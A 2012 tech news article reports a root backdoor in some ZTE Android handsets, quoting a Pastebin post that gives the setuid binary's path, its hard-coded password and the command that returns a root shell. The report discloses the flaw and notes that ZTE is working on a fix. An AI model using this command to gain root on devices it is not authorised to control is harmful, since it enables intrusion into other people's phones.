Home All our topics

Our sites

AfterDawn HIGH.FI

Our apps

News Reader (Android)

Follow us

Facebook Twitter

© AfterDawn Oy

ZTE handsets have 'root backdoor', say developers

James Delahunty
14 May 2012 20:41

Flaw can give root to any app, as long as the password is right.
The Pastebin post referred to the ZTE Score M on MetroPCS in the United States. It runs the Android 2.3.4 (Gingerbread) operating system.

There is a setuid-root application at /system/bin/sync_agent that serves no function besides providing a root shell backdoor on the device.

Just give the magic, hard-coded password to get a root shell:

$ sync_agent ztex1609523
# id
uid=0(root) gid=0(root)

Nice backdoor, ZTE.

According to AndroidAuthority, the ZTE Skate, sold by Orange in the UK, is also affected. ZTE has reportedly confirmed the problem and is said to be working on a fix for it.

XDA Recognized Developer shabbypenguin and XDA Elite Recognized Developer jcase, suggest that ZTE engineers likely left this enabled accidentally on the affected handsets before they shipped.

More from us
Android 16 will launch sooner than expected 11/01/2024 6:45
Winamp ends its "open source" project that wasn't really open source 10/20/2024 11:12
Winamp released its source code - but didn't go open source 09/25/2024 12:38
Does your phone rattle? Here's why it happens 08/25/2024 8:30
Tags
ZTE
We use cookies to improve our service.

© 1999 - 2024 AfterDawn Oy